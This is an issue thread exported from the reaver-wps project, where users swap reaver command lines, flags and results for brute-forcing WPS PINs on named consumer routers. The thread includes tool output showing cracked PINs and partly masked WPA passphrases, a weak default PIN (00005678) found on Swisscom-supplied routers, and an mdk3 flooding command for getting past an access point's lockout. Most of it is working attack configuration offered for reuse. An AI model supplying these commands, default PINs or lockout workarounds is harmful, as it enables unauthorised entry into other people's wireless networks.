bngmc / reaver-wps

Automatically exported from code.google.com/p/reaver-wps
0 stars 0 forks source link

Enhancement Request: Collate AP data for 'optimised' settings #78

Open GoogleCodeExporter opened 8 years ago

GoogleCodeExporter commented 8 years ago
What steps will reproduce the problem?
1. Allow users the option to send data to yourselves on the first three values 
of the MAC address of attacked AP's with the variables used to attack that AP 
and how successfull those attacks have been.

2.
3.

What is the expected output? What do you see instead?

The first 3 variables of the MAC address of an attacked AP show the 
manufacturer and sometimes the model.  If successful attacks are collated and 
uploaded for other users to utilise this would optimise attack strategy.

What version of the product are you using? On what operating system?

Please provide any additional information below.

Original issue reported on code.google.com by pinsb...@gmail.com on 5 Jan 2012 at 1:33

GoogleCodeExporter commented 8 years ago
The program shouldn't call home to send data without asking for user permission 
though.

Original comment by b1957...@nwldx.com on 5 Jan 2012 at 3:39

GoogleCodeExporter commented 8 years ago
That's why the first line said "Allow the users the option...."

Original comment by pinsb...@gmail.com on 5 Jan 2012 at 7:21

GoogleCodeExporter commented 8 years ago
Issue 96 has been merged into this issue.

Original comment by cheff...@tacnetsol.com on 6 Jan 2012 at 3:52

GoogleCodeExporter commented 8 years ago
We're looking in to having an open source database where users can submit 
settings and download the DB to be used with Reaver.

Original comment by cheff...@tacnetsol.com on 6 Jan 2012 at 3:53

GoogleCodeExporter commented 8 years ago
Perfect, thanks guys.

Original comment by pinsb...@gmail.com on 6 Jan 2012 at 4:18

GoogleCodeExporter commented 8 years ago
Backtrack 5v2 64bit
Atheros mini PCI ath9k
reaver v 1.4 r68
AP NetgearWNR 2000v2 E0:91:F5:60:xx:xx
Airodump signal -69 distance aprox 40m through window

command used:
reaver -i mon0 -b netgearsmacaddr -L -c 1 -a -d 0.2 -S -vv

-L was important because the AP locks for a random time but then continous 
while reaver running, when reaver has found the first four digit it does not 
lock anymore until the end.

-c was also important because the channel does not switch everytime during 
lockstate but you have to observe the output and check the channel again 
sometimes.

Original comment by patricks...@gmail.com on 6 Jan 2012 at 5:07

GoogleCodeExporter commented 8 years ago
[deleted comment]
GoogleCodeExporter commented 8 years ago
Backtrack 5v2 64bit
Atheros mini PCI ath9k
reaver v 1.4 r73
AP Linksys WRT120N 00:25:9C:E5:xx:xx
AP in same room

command used:
reaver -i mon0 -b linksysmacaddr -c 9 -vv

Walkthrough without problems, sometimes "Receive timout occurred"

Original comment by patricks...@gmail.com on 6 Jan 2012 at 10:13

GoogleCodeExporter commented 8 years ago
"That's why the first line said "Allow the users the option...." "

:D ... Whoops?

Original comment by b1957...@nwldx.com on 6 Jan 2012 at 10:19

GoogleCodeExporter commented 8 years ago
On the same AP Linksys WRT120N like above

reaver -i mon0 -b linksysmacaddr -d 0.3 -t 1 -vv

Walkthrough with (1 seconds/attempts) some Receive timeouts but who cares it 
runs faster.

Original comment by patricks...@gmail.com on 7 Jan 2012 at 12:40

GoogleCodeExporter commented 8 years ago
I did run the same AP Linksys with same Hardware again doing interrupts and 
starts between and it has recovered everthing well. May be this is the lucky 
combination of success. But it did not work on a Belkin and ZyXEL AP. The main 
part of the program is working correct, those errors could come from 
syncronisation problems.

Original comment by patricks...@gmail.com on 8 Jan 2012 at 1:44

GoogleCodeExporter commented 8 years ago

Original comment by cheff...@tacnetsol.com on 10 Jan 2012 at 5:56

GoogleCodeExporter commented 8 years ago
BT 5 r1 64bit
Atheros mini PCI ath9k
AP Broadband Solutions (Swisscom Router)
reaver 1.4 r97
signal -86

reaver -i mon0 -b 00:24:c9:73:xx:xx -a -c 1 -vv

positive attack

pin was a easy one 00005678
password found correct

Original comment by patricks...@gmail.com on 16 Jan 2012 at 10:20

GoogleCodeExporter commented 8 years ago
@patrick: Ha! That's an awesome pin - probably not a coincidence. Makes me 
wonder if other units/models from the same vendor have the same or similar pins.

Original comment by cheff...@tacnetsol.com on 16 Jan 2012 at 10:54

GoogleCodeExporter commented 8 years ago
BT 5 r1 64bit
Atheros mini PCI ath9k
AP Pirelli Broadband Solutions (Swisscom Router)
reaver 1.4 r100
signal -88

reaver -i mon0 -b 64:87:D7:1B:xx:xx -a -c11 -vv

positive attack

pin 01230000
password recovered correct

@ Craig another hit with a simple pin. Its the same Manufacturer of AP but must 
be a different model. I have such a lot of different Wlan adapters but it work 
only with this one.

Original comment by patricks...@gmail.com on 17 Jan 2012 at 12:19

GoogleCodeExporter commented 8 years ago
BT 5 r1 64bit
Atheros mini PCI ath9k
AP Broadband Solutions (Swisscom Router)
reaver 1.4 r100
signal -89

reaver -i mon0 -b 00:24:C9:8:xx:xx:xx -p 00005678 -c 6 -vv

[+] Pin cracked in 10 seconds
[+] WPS PIN: '00005678'
[+] WPA PSK: 'bo1w-oulv-xxxx-xxxx'
[+] AP SSID: 'PFx-40xxx'
------------------------------------------------------------
Another one
signal -87
AP Motorola (Swisscom)

reaver -i mon0 -b 00:26:42:xx:xx:xx -p 00005678 -c 11 -vv

[+] Pin cracked in 18 seconds
[+] WPS PIN: '00005678'
[+] WPA PSK: 'ykzk-csle-xxxx-xxxx'
[+] AP SSID: 'rix-33xxx'

I just went over to my friend for support and make a little test on his place 
:-).
It seems to be that our Swisscom ISP are configuring standards into their AP's.
They have strong passwords but ..........
Not everything in switzerland is secure :-).

Original comment by patricks...@gmail.com on 17 Jan 2012 at 2:19

GoogleCodeExporter commented 8 years ago
Patrick, that is awesome! I've added 00005678 as one of the first pins for 
Reaver to attempt. :)

Original comment by cheff...@tacnetsol.com on 17 Jan 2012 at 2:42

GoogleCodeExporter commented 8 years ago
Yes good job, and i was thinking that double zeros will not be used as first 
digits,
what a wrong idea....

Original comment by patricks...@gmail.com on 17 Jan 2012 at 2:45

GoogleCodeExporter commented 8 years ago
I thought so too myself, which is why I originally had Reaver randomizing the 
pins. It's hard to account for human error though. :)

Original comment by cheff...@tacnetsol.com on 17 Jan 2012 at 2:54

GoogleCodeExporter commented 8 years ago
what do you think of a enhancement of wash. When the output will have 
the -b just in front of the BSSID so it is more easyer to copy and 
paste to the reaver command.
Same would be possible for the Channel -c.

BSSID                Channel  ESSID     RSSI   WPS Version
----------------------------------------------------------
-b xz:xy:xy:xy:xy:xx -c 11 -e testap    -22    1.0

you see the shortcut?

Original comment by patricks...@gmail.com on 17 Jan 2012 at 7:31

GoogleCodeExporter commented 8 years ago
in my area insight (cable provider) uses belkin routers. they have been 
crackable but always in the last 10%, on all 4 so far lol. just my input

Original comment by entept...@gmail.com on 30 Jan 2012 at 1:05

GoogleCodeExporter commented 8 years ago
[deleted comment]
GoogleCodeExporter commented 8 years ago
hay guys!I have a problem, when I connect to a router, after a few minutes we 
detected AP expel rate limiting, waiting 60 seconds before re-checking, so I 
left a couple of hours but nothing happened. I tried all the commands that you 
wrote this-but none helps .. always the same thing happens .. WPA2-PSK - 
decryption
 router is a Siemens SX763-I live in Croatia ..
 please help you master, which is a little better understanding of linux and backtrack ..
 ps. Latest bactrack 5 R2 x32 comes ...
 Thanks in advance!

Original comment by bahrijaz...@gmail.com on 8 Mar 2012 at 11:47

GoogleCodeExporter commented 8 years ago
run "mdk3 mon0 a -a XX:XX:XX:XX:XX:XX" for 2-3 minutes it will fool the siemens 
and you continue with reaver until neccesary to repeat mdk3 command

Original comment by pozega.t...@gmail.com on 16 May 2012 at 7:17

GoogleCodeExporter commented 8 years ago
cheff how is the open source database goin? lamost waht 4 mmonth passed since 
that 

Original comment by bersebu...@gmail.com on 20 May 2012 at 4:34

GoogleCodeExporter commented 8 years ago
any database yet? I would like toknow about thomson used inportugal for ISP meo

Original comment by Tiago.Ge...@gmail.com on 26 Oct 2012 at 12:57